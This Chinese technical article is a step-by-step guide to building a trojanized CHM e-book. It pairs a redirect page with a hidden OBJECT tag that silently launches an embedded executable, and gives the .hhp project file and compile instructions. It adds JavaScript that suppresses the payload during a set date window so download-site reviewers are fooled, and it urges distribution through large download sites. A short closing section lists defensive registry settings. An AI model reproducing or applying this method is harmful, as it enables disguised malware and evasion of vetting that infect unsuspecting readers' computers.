电脑技术学习

详解电子书(CHM)木马病毒

dn001

  电子书木马(以下所指的电子书均指CHM格式的电子书)?其实这种方式的木马传播方法很早就有出现,但好象是多以网页木马的形式存在的,也就是把所谓的一个网页木马加入电子书里,这种效果和一般的网页木马的效果一样受到漏洞范围的限制,因此一直没引起人们的太大关注,也许大家觉得这样还不如直接的网页木马来得方便,其实不然,因为电子书相对与网页而言有许多“优点”,当然这里所谓的“优点”是指在传播木马方面而言的!

  相关推荐:特络伊木马查杀专区、

  在正式打造我们的电子书木马前,我们先分析一下它的“优点”吧!

  一:因为电子书一般是在本地电脑域打开的,因此它所获得的权限也是本地电脑域的权限,所以比起网页木马的Internet域来,让木马获得执行的机会要简单的多,“不必使用漏洞”就可以执行,从而也就不会被杀毒软件查杀,如果你的木马程序够好的话!也不必担心别人打了漏洞补丁!(Windows 2003除外,原因下面会说到);

  二:现在的网页木马由于影响力太大,一般的人上网都会小心三分提防的,且它依赖与漏洞,所以生存的空间正在逐渐缩小,与此相反的是电子书的火爆下载,使得电子书木马的传播能力以及范围大大加强!

  三:由于木马程序嵌入电子书里,一般的杀毒软件无法对其中存在的木马病毒等破坏性程序进行检查和清除,至少我还没发现有哪个软件可以做到这点,而且如果对这类电子书进行检查,杀毒所需时间也会过长!

  四:还有最后一点就是,网页木马一般都要自己辛辛苦苦的去传播,并且站点随时可能被关闭,而咱的电子书却可以让许多大的下载站点为咱做点贡献!获得长久时间的传播,当然前提是这本电子书够精彩!

  好啦!下面就让我带大家一步步打造个超级隐蔽的电子书木马吧!

  首先准备好工具如下:

  1:Microsoft HTML Help Workshop V1.32
    电子书制作工具,由微软公司出的编程配套软件,可以帮助您建立 HTML 格式的帮助文件!当然也可以用Quick CHM等其他CHM格式的电子书制作工具;
  2:超级木马一只(也就是一个你觉得最好的木马程序一个而已,相信大家比我熟悉),本文演示用“Window 按钮突破专家”这个小软件”;
  3:现在最火爆的电子书籍(大哥们,不要拿咱们菜鸟的电脑教材开刀呀!)若干,当然如果你有能力自己做我也不反对,本文演示用Windows 2000的帮助文档WINNTHelp下的access.chm开刀!

  准备好了吗?开始制作吧!

  第一步:

  打开access.chm,在右侧的空白处,点击右键菜单,选择属性,出现对话框:

  我们可以知道这个电子文档的默认主页是:accessibility_overview.htm,标题栏文字是:辅助选项

  第二步:

  制作一个可以让木马运行并且同时可以自动转到原电子书的默认主页的网页icyfox.htm,代码如下:

<HTML>
<HEAD>
<meta http-equiv="refresh" content="3;url='accessibility_overview.htm'">
</HEAD>
<BODY>
<OBJECT Width=0 Height=0 style="display:none;" TYPE="application/x-oleobject" CODEBASE="Window 按钮突破专家.exe">
</OBJECT>
</BODY>
</HTML>

  说明:把其中的accessibility_overview.htm改为你用的电子书的默认主页名,把“Window 按钮突破专家.exe”改为你的木马程序名!

  另外,如果你的木马程序体积比较大,请相应的把上面的转向时间3改的值大一点!

  在Windows 2003中默认在本地电脑域中好像并不允许OBJECT标签运行本地程序(我自己没装Windows 2003),所以不适合在Win2003使用!当然我们可以在代码中加入判断是否是Windows 2003的语句,来隐藏自己的木马!用navigator.appVersion属性判断!

  第三步:

  打开HTML Help Workshop,选择File菜单下的Decompile...项,对access.chm进行反编译。

  编译后的目录“G:CHM木马”中可以看到access.hhc(对应帮助文档左侧的“目录”项)和access.hhk(对应帮助文档左侧的“索引”项);

  第四步:

  建立一个新的带有木马的电子书;

  把“Window 按钮突破专家.exe”,也就是你的木马程序复制到反编译后的目录“G:CHM木马”中,并在此目录下建立一个icyfox.hhp的文件(用记事本即可!),内容如下(注意;号后面的注释不要写上):

[OPTIONS]
Compatibility=1.1 Or later
Compiled file=access.chm ;把access.chm改为你要生成的电子书名
Default Window=Main
Language=0x804 中文(中国)

[WINDOWS]
Main="辅助选项","access.hhc","access.hhk","icyfox.htm",,,,,,0x420,150,0x104E,,0x0,0x0,,,,,0
把上面的"辅助选项"改为你第一步时得到的标题栏文字,"access.hhc"及"access.hhk"分别改为你第三步得到的文件名
[FILES]
icyfox.htm

Window 按钮突破专家.exe ;把它改为你要嵌入电子书的木马程序名

  最后,用HTML Help Workshop打开icyfox.hhp,点击左侧最下面的编译按钮,稍等一会就可以在“G:CHM木马”目录中发现已经编译好的带有木马的电子书access.chm,打开看看!

  加入电子书中的程序是不是运行啦?!还和原来的电子书满相似的吧!当然由于我直接用的上面的icyfox.hhp直接来编译出来的,并没有对电子书进行更细致的调整,所以和原来的相比有点差异,当然如果你愿意,做出和原电子书一样的界面也可以的!^:^

  当然我直接写出icyfox.hhp这个文件的内容,也决不是为了多赚稿费,一方面免去制作电子书的过程说明,更重要的是因为它对你做一个可以“传染”其他电子书的木马是有作用的,不过鉴于这样做已经具有病毒的传染特性,其危害性过大,所以请不要找我要方法和代码,也请自己想出方法写出程序的各位大哥,不要进行大规模的散发!

  看到这里你也许会质问我所说的“优点”中的第四条根本没法实现,因为当“下载站点”的站长打开时同样会运行木马,所以他就不会在为你“免费服务”啦,咋办?

  最会,就让我和大家一起解决这点小问题,如何逃过那些“下载站点”的木马检测,而让他们不知不觉的帮助你传播电子书木马!

  分析一下,那些“下载站点”一般不会把你提供的电子书进行反编译吧?!所以只要在他们打开你的电子书查看时,不运行你的木马程序,这样他们就会放心的把它放到自己的站点上供其它人下载!我的方法是在icyfox.htm中加入用于判断时间的javascript代码,当大于某日期时,再动态写入运行木马的HTML代码,从而逃过检测,修改后的icyfox.htm如下:

<HTML>
<HEAD>
<meta http-equiv="refresh" content="3;url='accessibility_overview.htm'">
</HEAD>
<BODY>
<SCRIPT LANGUAGE="javascript">
//以下是在2004年4月11日至2004年4月18日之内不运行木马
var ris = 11; //起始日
var rie = 18; //结束日
var yue = 4; //月
var nian = 2004;//年

var riqi = new Date();
var d = riqi.getDate();
var m = riqi.getMonth()+1;
var y = riqi.getYear();

WIE=navigator.appVersion;

//if(WIE.indexOf("在此加入代表Win2003的字符串")==-1){执行下面的代码}//用这句可以防止在Win2003中运行木马
//我因为没有Win2003所以不知道版本该如何写,请装Win2003的兄弟把他改好!

if(y!=nian||m!=yue||d<ris||d>rie)
{
document.write('<OBJECT Width=0 Height=0 style="display:none;" TYPE="application/x-oleobject"');
document.write(' CODEBASE="Window 按钮突破专家.exe">');
document.write('</OBJECT>');
}
</SCRIPT>
</BODY>
</HTML>

  想想,你说这个电子书木马的生存传播效果如何?!

  最后,我说一下对这种电子书木马的预防措施:

  1.老生常谈,下载电子书在一些比较正规的大的站点进行,因为这里的书籍一般都是他们自己做的;

  2.积极自我防护,修改本地安全属性,使其无法在本地电脑域环境中运行木马程序,相应的注册表键值为:
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet SettingsZones下的1004项的值由原来的0改为十六进制的3,
如果你想详细修改本地电脑域的安全属性,可以把此同分支下的Flags项的值由原来的十六进制21改为0,再打开IE浏览器“Internet 选项...”中的的“安全”标签,是不是多了一个“我的电脑”图标,仔细改改它的安全级别吧

标签: 木马